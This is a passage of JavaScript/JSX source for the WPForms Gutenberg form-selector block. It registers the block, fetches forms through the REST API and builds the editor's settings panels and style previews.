/* global jconfirm, wpforms_gutenberg_form_selector, Choices, JSX, DOM, WPFormsUtils */
/* jshint es3: false, esversion: 6 */

/**
 * @param strings.copy_paste_error
 * @param strings.error_message
 * @param strings.form_edit
 * @param strings.form_entries
 * @param strings.form_keywords
 * @param strings.form_select
 * @param strings.form_selected
 * @param strings.form_settings
 * @param strings.label_styles
 * @param strings.other_styles
 * @param strings.page_break
 * @param strings.panel_notice_head
 * @param strings.panel_notice_link
 * @param strings.panel_notice_link_text
 * @param strings.panel_notice_text
 * @param strings.show_description
 * @param strings.show_title
 * @param strings.sublabel_hints
 * @param strings.form_not_available_message
 * @param urls.entries_url
 * @param urls.form_url
 * @param window.wpforms_choicesjs_config
 * @param wpforms_education.upgrade_bonus
 * @param wpforms_gutenberg_form_selector.block_empty_url
 * @param wpforms_gutenberg_form_selector.block_preview_url
 * @param wpforms_gutenberg_form_selector.get_started_url
 * @param wpforms_gutenberg_form_selector.is_full_styling
 * @param wpforms_gutenberg_form_selector.is_modern_markup
 * @param wpforms_gutenberg_form_selector.logo_url
 * @param wpforms_gutenberg_form_selector.wpforms_guide
 */

/**
 * Gutenberg editor block.
 *
 * Common module.
 *
 * @since 1.8.8
 */
export default ( function( document, window, $ ) {
	/**
	 * WP core components.
	 *
	 * @since 1.8.8
	 */
	const { serverSideRender: ServerSideRender = wp.components.ServerSideRender } = wp;
	const { createElement, Fragment, createInterpolateElement } = wp.element;
	const { registerBlockType } = wp.blocks;
	const { InspectorControls, PanelColorSettings, useBlockProps } = wp.blockEditor || wp.editor;
	const { SelectControl, ToggleControl, PanelBody, Placeholder } = wp.components;
	const { __ } = wp.i18n;
	const { useState, useEffect } = wp.element;

	/**
	 * Localized data aliases.
	 *
	 * @since 1.8.8
	 */
	const { strings, defaults, sizes, urls, isPro, isLicenseActive, isAdmin } = wpforms_gutenberg_form_selector;
	const defaultStyleSettings = defaults;

	// noinspection JSUnusedLocalSymbols
	/**
	 * WPForms Education script.
	 *
	 * @since 1.8.8
	 */
	const WPFormsEducation = window.WPFormsEducation || {}; // eslint-disable-line no-unused-vars

	/**
	 * List of forms.
	 *
	 * The default value is localized in FormSelector.php.
	 *
	 * @since 1.8.4
	 *
	 * @type {Object}
	 */
	let formList = wpforms_gutenberg_form_selector.forms;

	/**
	 * Blocks runtime data.
	 *
	 * @since 1.8.1
	 *
	 * @type {Object}
	 */
	const blocks = {};

	/**
	 * Whether it is needed to trigger server rendering.
	 *
	 * @since 1.8.1
	 *
	 * @type {boolean}
	 */
	let triggerServerRender = true;

	/**
	 * Popup container.
	 *
	 * @since 1.8.3
	 *
	 * @type {Object}
	 */
	let $popup = {};

	/**
	 * Track fetch status.
	 *
	 * @since 1.8.4
	 *
	 * @type {boolean}
	 */
	let isFetching = false;

	/**
	 * Elements holder.
	 *
	 * @since 1.8.8
	 *
	 * @type {Object}
	 */
	const el = {};

	/**
	 * Common block attributes.
	 *
	 * @since 1.8.8
	 *
	 * @type {Object}
	 */
	let commonAttributes = {
		clientId: {
			type: 'string',
			default: '',
		},
		formId: {
			type: 'string',
			default: defaultStyleSettings.formId,
		},
		displayTitle: {
			type: 'boolean',
			default: defaultStyleSettings.displayTitle,
		},
		displayDesc: {
			type: 'boolean',
			default: defaultStyleSettings.displayDesc,
		},
		preview: {
			type: 'boolean',
		},
		theme: {
			type: 'string',
			default: defaultStyleSettings.theme,
		},
		themeName: {
			type: 'string',
			default: defaultStyleSettings.themeName,
		},
		labelSize: {
			type: 'string',
			default: defaultStyleSettings.labelSize,
		},
		labelColor: {
			type: 'string',
			default: defaultStyleSettings.labelColor,
		},
		labelSublabelColor: {
			type: 'string',
			default: defaultStyleSettings.labelSublabelColor,
		},
		labelErrorColor: {
			type: 'string',
			default: defaultStyleSettings.labelErrorColor,
		},
		pageBreakColor: {
			type: 'string',
			default: defaultStyleSettings.pageBreakColor,
		},
		customCss: {
			type: 'string',
			default: defaultStyleSettings.customCss,
		},
		copyPasteJsonValue: {
			type: 'string',
			default: defaultStyleSettings.copyPasteJsonValue,
		},
	};

	/**
	 * Handlers for custom styles settings, defined outside this module.
	 *
	 * @since 1.8.8
	 *
	 * @type {Object}
	 */
	let customStylesHandlers = {};

	/**
	 * Dropdown timeout.
	 *
	 * @since 1.8.8
	 *
	 * @type {number}
	 */
	let dropdownTimeout;

	/**
	 * Whether copy-paste content was generated on edit.
	 *
	 * @since 1.9.1
	 *
	 * @type {boolean}
	 */
	let isCopyPasteGeneratedOnEdit = false;

	/**
	 * Whether the background is selected.
	 *
	 * @since 1.9.3
	 *
	 * @type {boolean}
	 */
	let backgroundSelected = false;

	/**
	 * Public functions and properties.
	 *
	 * @since 1.8.1
	 *
	 * @type {Object}
	 */
	const app = {

		/**
		 * Panel modules.
		 *
		 * @since 1.8.8
		 *
		 * @type {Object}
		 */
		panels: {},

		/**
		 * Start the engine.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} blockOptions Block options.
		 */
		init( blockOptions ) {
			el.$window = $( window );
			app.panels = blockOptions.panels;
			app.education = blockOptions.education;

			app.initDefaults( blockOptions );
			app.registerBlock( blockOptions );

			app.initJConfirm();

			$( app.ready );
		},

		/**
		 * Document ready.
		 *
		 * @since 1.8.1
		 */
		ready() {
			app.events();
		},

		/**
		 * Events.
		 *
		 * @since 1.8.1
		 */
		events() {
			el.$window
				.on( 'wpformsFormSelectorEdit', _.debounce( app.blockEdit, 250 ) )
				.on( 'wpformsFormSelectorFormLoaded', app.formLoaded );
		},

		/**
		 * Init jConfirm.
		 *
		 * @since 1.8.8
		 */
		initJConfirm() {
			// jquery-confirm defaults.
			jconfirm.defaults = {
				closeIcon: false,
				backgroundDismiss: false,
				escapeKey: true,
				animationBounce: 1,
				useBootstrap: false,
				theme: 'modern',
				boxWidth: '400px',
				animateFromElement: false,
			};
		},

		/**
		 * Get a fresh list of forms via REST-API.
		 *
		 * @since 1.8.4
		 *
		 * @see https://developer.wordpress.org/block-editor/reference-guides/packages/packages-api-fetch/
		 */
		async getForms() {
			// If a fetch is already in progress, exit the function.
			if ( isFetching ) {
				return;
			}

			// Set the flag to true indicating a fetch is in progress.
			isFetching = true;

			try {
				// Fetch forms.
				formList = await wp.apiFetch( {
					path: wpforms_gutenberg_form_selector.route_namespace + 'forms/',
					method: 'GET',
					cache: 'no-cache',
				} );
			} catch ( error ) {
				// eslint-disable-next-line no-console
				console.error( error );
			} finally {
				isFetching = false;
			}
		},

		/**
		 * Open builder popup.
		 *
		 * @since 1.6.2
		 *
		 * @param {string} clientID Block Client ID.
		 */
		openBuilderPopup( clientID ) {
			if ( $.isEmptyObject( $popup ) ) {
				const parent = $( '#wpwrap' );
				const canvasIframe = $( 'iframe[name="editor-canvas"]' );
				const isFseMode = Boolean( canvasIframe.length );
				const tmpl = isFseMode ? canvasIframe.contents().find( '#wpforms-gutenberg-popup' ) : $( '#wpforms-gutenberg-popup' );

				parent.after( tmpl );

				$popup = parent.siblings( '#wpforms-gutenberg-popup' );
			}

			const url = wpforms_gutenberg_form_selector.get_started_url,
				$iframe = $popup.find( 'iframe' );

			app.builderCloseButtonEvent( clientID );
			$iframe.attr( 'src', url );
			$popup.fadeIn();
		},

		/**
		 * Close button (inside the form builder) click event.
		 *
		 * @since 1.8.3
		 *
		 * @param {string} clientID Block Client ID.
		 */
		builderCloseButtonEvent( clientID ) {
			$popup
				.off( 'wpformsBuilderInPopupClose' )
				.on( 'wpformsBuilderInPopupClose', function( e, action, formId, formTitle ) {
					if ( action !== 'saved' || ! formId ) {
						return;
					}

					// Insert a new block when a new form is created from the popup to update the form list and attributes.
					const newBlock = wp.blocks.createBlock( 'wpforms/form-selector', {
						formId: formId.toString(), // Expects string value, make sure we insert string.
					} );

					// eslint-disable-next-line camelcase
					formList = [ { ID: formId, post_title: formTitle } ];

					// Insert a new block.
					wp.data.dispatch( 'core/block-editor' ).removeBlock( clientID );
					wp.data.dispatch( 'core/block-editor' ).insertBlocks( newBlock );
				} );
		},

		/**
		 * Register block.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} blockOptions Additional block options.
		 */
		// eslint-disable-next-line max-lines-per-function
		registerBlock( blockOptions ) {
			registerBlockType( 'wpforms/form-selector', {
				title: strings.title,
				description: strings.description,
				icon: app.getIcon(),
				keywords: strings.form_keywords,
				category: 'widgets',
				attributes: app.getBlockAttributes(),
				supports: {
					customClassName: app.hasForms(),
				},
				example: {
					attributes: {
						preview: true,
					},
				},
				// eslint-disable-next-line max-lines-per-function,complexity
				edit( props ) {
					const { attributes } = props;
					const formOptions = app.getFormOptions();
					const handlers = app.getSettingsFieldsHandlers( props );

					const [ isNotDisabled ] = useState( isPro && isLicenseActive ); // eslint-disable-line react-hooks/rules-of-hooks
					const [ isProEnabled ] = useState( isPro ); // eslint-disable-line react-hooks/rules-of-hooks, no-unused-vars
					const [ showBackgroundPreview, setShowBackgroundPreview ] = useState( blockOptions.panels.background._showBackgroundPreview( props ) ); // eslint-disable-line react-hooks/rules-of-hooks
					const [ lastBgImage, setLastBgImage ] = useState( '' ); // eslint-disable-line react-hooks/rules-of-hooks

					const uiState = {
						isNotDisabled,
						isProEnabled,
						showBackgroundPreview,
						setShowBackgroundPreview,
						lastBgImage,
						setLastBgImage,
					};

					useEffect( () => { // eslint-disable-line react-hooks/rules-of-hooks
						if ( attributes.formId ) {
							setShowBackgroundPreview(
								props.attributes.backgroundImage !== 'none' &&
								props.attributes.backgroundUrl &&
								props.attributes.backgroundUrl !== 'url()'
							);
						}
					}, [ backgroundSelected, props.attributes.backgroundImage, props.attributes.backgroundUrl ] ); // eslint-disable-line react-hooks/exhaustive-deps

					// Get block properties.
					const blockProps = useBlockProps(); // eslint-disable-line react-hooks/rules-of-hooks, no-unused-vars

					// Store block clientId in attributes.
					if ( ! attributes.clientId || ! app.isClientIdAttrUnique( props ) ) {
						// We just want the client ID to update once.
						// The block editor doesn't have a fixed block ID, so we need to get it on the initial load, but only once.
						props.setAttributes( { clientId: props.clientId } );
					}

					// Main block settings.
					const jsx = [
						app.jsxParts.getMainSettings( attributes, handlers, formOptions ),
					];

					// Block preview picture.
					if ( ! app.hasForms() ) {
						jsx.push(
							app.jsxParts.getEmptyFormsPreview( props ),
						);

						return <div { ...blockProps }>{ jsx }</div>;
					}

					const sizeOptions = app.getSizeOptions();

					// Show placeholder when form is not available (trashed, deleted etc.).
					if ( attributes && attributes.formId && app.isFormAvailable( attributes.formId ) === false ) {
						// Block placeholder (form selector).
						jsx.push(
							app.jsxParts.getBlockPlaceholder( props.attributes, handlers, formOptions ),
						);

						return <div { ...blockProps }>{ jsx }</div>;
					}

					// Form style settings & block content.
					if ( attributes.formId ) {
						// Subscribe to block events.
						app.maybeSubscribeToBlockEvents( props, handlers, blockOptions );

						jsx.push(
							app.jsxParts.getStyleSettings( props, handlers, sizeOptions, blockOptions, uiState ),
							app.jsxParts.getBlockFormContent( props )
						);

						if ( ! isCopyPasteGeneratedOnEdit ) {
							handlers.updateCopyPasteContent();

							isCopyPasteGeneratedOnEdit = true;
						}

						el.$window.trigger( 'wpformsFormSelectorEdit', [ props ] );

						return <div { ...blockProps }>{ jsx }</div>;
					}

					// Block preview picture.
					if ( attributes.preview ) {
						jsx.push(
							app.jsxParts.getBlockPreview(),
						);

						return <div { ...blockProps }>{ jsx }</div>;
					}

					// Block placeholder (form selector).
					jsx.push(
						app.jsxParts.getBlockPlaceholder( props.attributes, handlers, formOptions ),
					);

					return <div { ...blockProps }>{ jsx }</div>;
				},
				save: () => null,
			} );
		},

		/**
		 * Init default style settings.
		 *
		 * @since 1.8.1
		 * @since 1.8.8 Added blockOptions parameter.
		 *
		 * @param {Object} blockOptions Additional block options.
		 */
		initDefaults( blockOptions = {} ) {
			commonAttributes = {
				...commonAttributes,
				...blockOptions.getCommonAttributes(),
			};
			customStylesHandlers = blockOptions.setStylesHandlers;

			[ 'formId', 'copyPasteJsonValue' ].forEach( ( key ) => delete defaultStyleSettings[ key ] );
		},

		/**
		 * Check if the site has forms.
		 *
		 * @since 1.8.3
		 *
		 * @return {boolean} Whether site has at least one form.
		 */
		hasForms() {
			return formList.length > 0;
		},

		/**
		 * Check if form is available to be previewed.
		 *
		 * @since 1.8.9
		 *
		 * @param {number} formId Form ID.
		 *
		 * @return {boolean} Whether form is available.
		 */
		isFormAvailable( formId ) {
			return formList.find( ( { ID } ) => ID === Number( formId ) ) !== undefined;
		},

		/**
		 * Set triggerServerRender flag.
		 *
		 * @since 1.8.8
		 *
		 * @param {boolean} $flag The value of the triggerServerRender flag.
		 */
		setTriggerServerRender( $flag ) {
			triggerServerRender = Boolean( $flag );
		},

		/**
		 * Maybe subscribe to block events.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} subscriberProps        Subscriber block properties.
		 * @param {Object} subscriberHandlers     Subscriber block event handlers.
		 * @param {Object} subscriberBlockOptions Subscriber block options.
		 */
		maybeSubscribeToBlockEvents( subscriberProps, subscriberHandlers, subscriberBlockOptions ) {
			const id = subscriberProps.clientId;

			// Unsubscribe from block events.
			// This is needed to avoid multiple subscriptions when the block is re-rendered.
			el.$window
				.off( 'wpformsFormSelectorDeleteTheme.' + id )
				.off( 'wpformsFormSelectorUpdateTheme.' + id )
				.off( 'wpformsFormSelectorSetTheme.' + id );

			// Subscribe to block events.
			el.$window
				.on( 'wpformsFormSelectorDeleteTheme.' + id, app.subscriberDeleteTheme( subscriberProps, subscriberBlockOptions ) )
				.on( 'wpformsFormSelectorUpdateTheme.' + id, app.subscriberUpdateTheme( subscriberProps, subscriberBlockOptions ) )
				.on( 'wpformsFormSelectorSetTheme.' + id, app.subscriberSetTheme( subscriberProps, subscriberBlockOptions ) );
		},

		/**
		 * Block event `wpformsFormSelectorDeleteTheme` handler.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} subscriberProps        Subscriber block properties
		 * @param {Object} subscriberBlockOptions Subscriber block options.
		 *
		 * @return {Function} Event handler.
		 */
		subscriberDeleteTheme( subscriberProps, subscriberBlockOptions ) {
			return function( e, themeSlug, triggerProps ) {
				if ( subscriberProps.clientId === triggerProps.clientId ) {
					return;
				}

				if ( subscriberProps?.attributes?.theme !== themeSlug ) {
					return;
				}

				if ( ! subscriberBlockOptions?.panels?.themes ) {
					return;
				}

				// Reset theme to default one.
				subscriberBlockOptions.panels.themes.setBlockTheme( subscriberProps, 'default' );
			};
		},

		/**
		 * Block event `wpformsFormSelectorDeleteTheme` handler.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} subscriberProps        Subscriber block properties
		 * @param {Object} subscriberBlockOptions Subscriber block options.
		 *
		 * @return {Function} Event handler.
		 */
		subscriberUpdateTheme( subscriberProps, subscriberBlockOptions ) {
			return function( e, themeSlug, themeData, triggerProps ) {
				if ( subscriberProps.clientId === triggerProps.clientId ) {
					return;
				}

				if ( subscriberProps?.attributes?.theme !== themeSlug ) {
					return;
				}

				if ( ! subscriberBlockOptions?.panels?.themes ) {
					return;
				}

				// Reset theme to default one.
				subscriberBlockOptions.panels.themes.setBlockTheme( subscriberProps, themeSlug );
			};
		},

		/**
		 * Block event `wpformsFormSelectorSetTheme` handler.
		 *
		 * @since 1.8.8
		 *
		 * @param {Object} subscriberProps        Subscriber block properties
		 * @param {Object} subscriberBlockOptions Subscriber block options.
		 *
		 * @return {Function} Event handler.
		 */
		subscriberSetTheme( subscriberProps, subscriberBlockOptions ) {
			// noinspection JSUnusedLocalSymbols
			return function( e, block, themeSlug, triggerProps ) { // eslint-disable-line no-unused-vars
				if ( subscriberProps.clientId === triggerProps.clientId ) {
					return;
				}

				if ( ! subscriberBlockOptions?.panels?.themes ) {
					return;
				}

				// Set theme.
				app.onSetTheme( subscriberProps );
			};
		},

		/**
		 * Block JSX parts.
		 *
		 * @since 1.8.1
		 *
		 * @type {Object}
		 */
		jsxParts: {

			/**
			 * Get main settings JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @param {Object} attributes  Block attributes.
			 * @param {Object} handlers    Block event handlers.
			 * @param {Object} formOptions Form selector options.
			 *
			 * @return {JSX.Element} Main setting JSX code.
			 */
			getMainSettings( attributes, handlers, formOptions ) { // eslint-disable-line max-lines-per-function
				if ( ! app.hasForms() ) {
					return app.jsxParts.printEmptyFormsNotice( attributes.clientId );
				}

				return (
					<InspectorControls key="wpforms-gutenberg-form-selector-inspector-main-settings">
						<PanelBody className="wpforms-gutenberg-panel wpforms-gutenberg-panel-form-settings" title={ strings.form_settings }>
							<SelectControl
								label={ strings.form_selected }
								value={ attributes.formId }
								options={ formOptions }
								onChange={ ( value ) => handlers.attrChange( 'formId', value ) }
							/>
							{ attributes.formId ? (
								<>
									<p className="wpforms-gutenberg-form-selector-actions">
										<a href={ urls.form_url.replace( '{ID}', attributes.formId ) } rel="noreferrer" target="_blank">
											{ strings.form_edit }
										</a>
										{ isPro && isLicenseActive && (
											<>
												&nbsp;&nbsp;|&nbsp;&nbsp;
												<a
													href={ urls.entries_url.replace( '{ID}', attributes.formId ) }
													rel="noreferrer"
													target="_blank"
												>{ strings.form_entries }</a>
											</>
										) }
									</p>
									<ToggleControl
										label={ strings.show_title }
										checked={ attributes.displayTitle }
										onChange={ ( value ) => handlers.attrChange( 'displayTitle', value ) }
									/>
									<ToggleControl
										label={ strings.show_description }
										checked={ attributes.displayDesc }
										onChange={ ( value ) => handlers.attrChange( 'displayDesc', value ) }
									/>
								</>
							) : null }
							<p className="wpforms-gutenberg-panel-notice">
								<strong>{ strings.panel_notice_head }</strong>
								{ strings.panel_notice_text }
								<a href={ strings.panel_notice_link } rel="noreferrer" target="_blank">{ strings.panel_notice_link_text }</a>
							</p>
						</PanelBody>
					</InspectorControls>
				);
			},

			/**
			 * Print empty forms notice.
			 *
			 * @since 1.8.3
			 *
			 * @param {string} clientId Block client ID.
			 *
			 * @return {JSX.Element} Field styles JSX code.
			 */
			printEmptyFormsNotice( clientId ) {
				return (
					<InspectorControls key="wpforms-gutenberg-form-selector-inspector-main-settings">
						<PanelBody className="wpforms-gutenberg-panel" title={ strings.form_settings }>
							<p className="wpforms-gutenberg-panel-notice wpforms-warning wpforms-empty-form-notice" style={ { display: 'block' } }>
								<strong>{ __( 'You haven’t created a form, yet!', 'wpforms-lite' ) }</strong>
								{ __( 'What are you waiting for?', 'wpforms-lite' ) }
							</p>
							<button type="button" className="get-started-button components-button is-secondary"
								onClick={
									() => {
										app.openBuilderPopup( clientId );
									}
								}
							>
								{ __( 'Get Started', 'wpforms-lite' ) }
							</button>
						</PanelBody>
					</InspectorControls>
				);
			},

			/**
			 * Get Label styles JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @param {Object} props       Block properties.
			 * @param {Object} handlers    Block event handlers.
			 * @param {Object} sizeOptions Size selector options.
			 *
			 * @return {Object} Label styles JSX code.
			 */
			getLabelStyles( props, handlers, sizeOptions ) {
				return (
					<PanelBody className={ app.getPanelClass( props ) } title={ strings.label_styles }>
						<SelectControl
							label={ strings.size }
							value={ props.attributes.labelSize }
							className="wpforms-gutenberg-form-selector-fix-bottom-margin"
							options={ sizeOptions }
							onChange={ ( value ) => handlers.styleAttrChange( 'labelSize', value ) }
						/>

						<div className="wpforms-gutenberg-form-selector-color-picker">
							<div className="wpforms-gutenberg-form-selector-control-label">{ strings.colors }</div>
							<PanelColorSettings
								__experimentalIsRenderedInSidebar
								enableAlpha
								showTitle={ false }
								className="wpforms-gutenberg-form-selector-color-panel"
								colorSettings={ [
									{
										value: props.attributes.labelColor,
										onChange: ( value ) => handlers.styleAttrChange( 'labelColor', value ),
										label: strings.label,
									},
									{
										value: props.attributes.labelSublabelColor,
										onChange: ( value ) => handlers.styleAttrChange( 'labelSublabelColor', value ),
										label: strings.sublabel_hints.replace( '&amp;', '&' ),
									},
									{
										value: props.attributes.labelErrorColor,
										onChange: ( value ) => handlers.styleAttrChange( 'labelErrorColor', value ),
										label: strings.error_message,
									},
								] }
							/>
						</div>
					</PanelBody>
				);
			},

			/**
			 * Get Page Indicator styles JSX code.
			 *
			 * @since 1.8.7
			 *
			 * @param {Object} props    Block properties.
			 * @param {Object} handlers Block event handlers.
			 *
			 * @return {Object} Page Indicator styles JSX code.
			 */
			getPageIndicatorStyles( props, handlers ) { // eslint-disable-line complexity
				const hasPageBreak = app.hasPageBreak( formList, props.attributes.formId );
				const hasRating = app.hasRating( formList, props.attributes.formId );

				if ( ! hasPageBreak && ! hasRating ) {
					return null;
				}

				let label = '';
				if ( hasPageBreak && hasRating ) {
					label = `${ strings.page_break } / ${ strings.rating }`;
				} else if ( hasPageBreak ) {
					label = strings.page_break;
				} else if ( hasRating ) {
					label = strings.rating;
				}

				return (
					<PanelBody className={ app.getPanelClass( props ) } title={ strings.other_styles }>
						<div className="wpforms-gutenberg-form-selector-color-picker">
							<div className="wpforms-gutenberg-form-selector-control-label">{ strings.colors }</div>
							<PanelColorSettings
								__experimentalIsRenderedInSidebar
								enableAlpha
								showTitle={ false }
								className="wpforms-gutenberg-form-selector-color-panel"
								colorSettings={ [
									{
										value: props.attributes.pageBreakColor,
										onChange: ( value ) => handlers.styleAttrChange( 'pageBreakColor', value ),
										label,
									},
								] } />
						</div>
					</PanelBody>
				);
			},

			/**
			 * Get style settings JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @param {Object} props        Block properties.
			 * @param {Object} handlers     Block event handlers.
			 * @param {Object} sizeOptions  Size selector options.
			 * @param {Object} blockOptions Block options loaded from external modules.
			 * @param {Object} uiState      UI state.
			 *
			 * @return {Object} Inspector controls JSX code.
			 */
			getStyleSettings( props, handlers, sizeOptions, blockOptions, uiState ) {
				return (
					<InspectorControls key="wpforms-gutenberg-form-selector-style-settings">
						{ blockOptions.getThemesPanel( props, app, blockOptions.stockPhotos ) }
						{ blockOptions.getFieldStyles( props, handlers, sizeOptions, app ) }
						{ app.jsxParts.getLabelStyles( props, handlers, sizeOptions ) }
						{ blockOptions.getButtonStyles( props, handlers, sizeOptions, app ) }
						{ blockOptions.getContainerStyles( props, handlers, app, uiState ) }
						{ blockOptions.getBackgroundStyles( props, handlers, app, blockOptions.stockPhotos, uiState ) }
						{ app.jsxParts.getPageIndicatorStyles( props, handlers ) }
					</InspectorControls>
				);
			},

			/**
			 * Get block content JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @param {Object} props Block properties.
			 *
			 * @return {JSX.Element} Block content JSX code.
			 */
			getBlockFormContent( props ) {
				if ( triggerServerRender ) {
					return (
						<ServerSideRender
							key="wpforms-gutenberg-form-selector-server-side-renderer"
							block="wpforms/form-selector"
							attributes={ props.attributes }
						/>
					);
				}

				const clientId = props.clientId;
				const block = app.getBlockContainer( props );

				// In the case of empty content, use server side renderer.
				// This happens when the block is duplicated or converted to a reusable block.
				if ( ! block?.innerHTML ) {
					triggerServerRender = true;

					return app.jsxParts.getBlockFormContent( props );
				}

				blocks[ clientId ] = blocks[ clientId ] || {};
				blocks[ clientId ].blockHTML = block.innerHTML;
				blocks[ clientId ].loadedFormId = props.attributes.formId;

				return (
					<Fragment key="wpforms-gutenberg-form-selector-fragment-form-html">
						<div dangerouslySetInnerHTML={ { __html: blocks[ clientId ].blockHTML } } />
					</Fragment>
				);
			},

			/**
			 * Get block preview JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @return {JSX.Element} Block preview JSX code.
			 */
			getBlockPreview() {
				return (
					<Fragment
						key="wpforms-gutenberg-form-selector-fragment-block-preview">
						<img src={ wpforms_gutenberg_form_selector.block_preview_url } style={ { width: '100%' } } alt="" />
					</Fragment>
				);
			},

			/**
			 * Get block empty JSX code.
			 *
			 * @since 1.8.3
			 *
			 * @param {Object} props Block properties.
			 * @return {JSX.Element} Block empty JSX code.
			 */
			getEmptyFormsPreview( props ) {
				const clientId = props.clientId;

				return (
					<Fragment
						key="wpforms-gutenberg-form-selector-fragment-block-empty">
						<div className="wpforms-no-form-preview">
							<img src={ wpforms_gutenberg_form_selector.block_empty_url } alt="" />
							<p>
								{
									createInterpolateElement(
										__(
											'You can use <b>WPForms</b> to build contact forms, surveys, payment forms, and more with just a few clicks.',
											'wpforms-lite'
										),
										{
											b: <strong />,
										}
									)
								}
							</p>
							<button type="button" className="get-started-button components-button is-primary"
								onClick={
									() => {
										app.openBuilderPopup( clientId );
									}
								}
							>
								{ __( 'Get Started', 'wpforms-lite' ) }
							</button>
							<p className="empty-desc">
								{
									createInterpolateElement(
										__(
											'Need some help? Check out our <a>comprehensive guide.</a>',
											'wpforms-lite'
										),
										{
											// eslint-disable-next-line jsx-a11y/anchor-has-content
											a: <a href={ wpforms_gutenberg_form_selector.wpforms_guide } target="_blank" rel="noopener noreferrer" />,
										}
									)
								}
							</p>

							{ /* Template for popup with builder iframe */ }
							<div id="wpforms-gutenberg-popup" className="wpforms-builder-popup">
								<iframe src="about:blank" width="100%" height="100%" id="wpforms-builder-iframe" title="WPForms Builder Popup"></iframe>
							</div>
						</div>
					</Fragment>
				);
			},

			/**
			 * Get block placeholder (form selector) JSX code.
			 *
			 * @since 1.8.1
			 *
			 * @param {Object} attributes  Block attributes.
			 * @param {Object} handlers    Block event handlers.
			 * @param {Object} formOptions Form selector options.
			 *
			 * @return {JSX.Element} Block placeholder JSX code.
			 */
			getBlockPlaceholder( attributes, handlers, formOptions ) {
				const isFormNotAvailable = attributes.formId && ! app.isFormAvailable( attributes.formId );

				return (
					<Placeholder
						key="wpforms-gutenberg-form-selector-wrap"
						className="wpforms-gutenberg-form-selector-wrap">
						<img src={ wpforms_gutenberg_form_selector.logo_url } alt="" />
						{ isFormNotAvailable && (
							<p style={ { textAlign: 'center', marginTop: '0' } }>
								{ strings.form_not_available_message }
							</p>
						) }
						<SelectControl
							key="wpforms-gutenberg-form-selector-select-control"
							value={ attributes.formId }
							options={ formOptions }
							onChange={ ( value ) => handlers.attrChange( 'formId', value ) }
						/>
					</Placeholder>
				);
			},
		},

		/**
		 * Determine if the form has a Page Break field.
		 *
		 * @since 1.8.7
		 *
		 * @param {Object}        forms  The forms' data object.
		 * @param {number|string} formId Form ID.
		 *
		 * @return {boolean} True when the form has a Page Break field, false otherwise.
		 */
		hasPageBreak( forms, formId ) {
			const currentForm = forms.find( ( form ) => parseInt( form.ID, 10 ) === parseInt( formId, 10 ) );

			if ( ! currentForm.post_content ) {
				return false;
			}

			const fields = JSON.parse( currentForm.post_content )?.fields;

			return Object.values( fields ).some( ( field ) => field.type === 'pagebreak' );
		},

		hasRating( forms, formId ) {
			const currentForm = forms.find( ( form ) => parseInt( form.ID, 10 ) === parseInt( formId, 10 ) );

			if ( ! currentForm.post_content || ! isPro || ! isLicenseActive ) {
				return false;
			}

			const fields = JSON.parse( currentForm.post_content )?.fields;

			return Object.values( fields ).some( ( field ) => field.type === 'rating' );
		},

		/**
		 * Get Style Settings panel class.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} props Block properties.
		 * @param {string} panel Panel name.
		 *
		 * @return {string} Style Settings panel class.
		 */
		getPanelClass( props, panel = '' ) {
			let cssClass = 'wpforms-gutenberg-panel wpforms-block-settings-' + props.clientId;

			if ( ! app.isFullStylingEnabled() ) {
				cssClass += ' disabled_panel';
			}

			// Restrict styling panel for non-admins.
			if ( ! ( isAdmin || panel === 'themes' ) ) {
				cssClass += ' wpforms-gutenberg-panel-restricted';
			}

			return cssClass;
		},

		/**
		 * Get color panel settings CSS class.
		 *
		 * @since 1.8.8
		 *
		 * @param {string} borderStyle Border style value.
		 *
		 * @return {string} Style Settings panel class.
		 */
		getColorPanelClass( borderStyle ) {
			let cssClass = 'wpforms-gutenberg-form-selector-color-panel';

			if ( borderStyle === 'none' ) {
				cssClass += ' wpforms-gutenberg-form-selector-border-color-disabled';
			}

			return cssClass;
		},

		/**
		 * Determine whether the full styling is enabled.
		 *
		 * @since 1.8.1
		 *
		 * @return {boolean} Whether the full styling is enabled.
		 */
		isFullStylingEnabled() {
			return wpforms_gutenberg_form_selector.is_modern_markup && wpforms_gutenberg_form_selector.is_full_styling;
		},

		/**
		 * Determine whether the block has lead forms enabled.
		 *
		 * @since 1.9.0
		 *
		 * @param {Object} block Gutenberg block
		 *
		 * @return {boolean} Whether the block has lead forms enabled
		 */
		isLeadFormsEnabled( block ) {
			if ( ! block ) {
				return false;
			}

			const $form = $( block.querySelector( '.wpforms-container' ) );

			return $form.hasClass( 'wpforms-lead-forms-container' );
		},

		/**
		 * Get block container DOM element.
		 *
		 * @since 1.8.1
		 *
		 * @param {Object} props Block properties.
		 *
		 * @return {Element} Block container.
		 */
		getBlockContainer( props ) {
			const blockSelector = `#block-${ props.clientId } > div`;
			let block = document.querySelector( blockSelector );

			// For FSE / Gutenberg plugin, we need to take a look inside the iframe.
			if ( ! block ) {
				const editorCanvas = document.querySelector( 'iframe[name="editor-canvas"]' );

				block = editorCanvas?.contentWindow.document.querySelector( blockSelector );
			}

			return block;
		},

		/**
		 * Get form container in Block Editor.
		 *
		 * @since 1.9.3
		 *
		 * @param {number} formId Form ID.
		 *
		 * @return {Element|null} Form container.
		 */
		getFormBlock( formId ) {
			// First, try to find the iframe for blocks version 3.
			const editorCanvas = document.querySelector( 'iframe[name="editor-canvas"]' );

			// If the iframe is found, try to find the form.
			return editorCanvas?.contentWindow.document.querySelector( `#wpforms-${ formId }` ) || $( `#wpforms-${ formId }` );
		},

		/**
		 * Update CSS variable(s) value(s) of the given attribute for given container on the preview.
		 *
		 * @since 1.8.8
		 *
		 * @param {string}  attribute Style attribute: field-size, label-size, button-size, etc.
		 * @param {string}  value     Property new value.
		 * @param {Element} container Form container.
		 * @param {Object}  props     Block properties.
		 */
		updatePreviewCSSVarValue( attribute, value, container, props ) { // eslint-disable-line complexity, max-lines-per-function
			if ( ! container || ! attribute ) {
				return;
			}

			const property = attribute.replace(
				/[A-Z]/g,
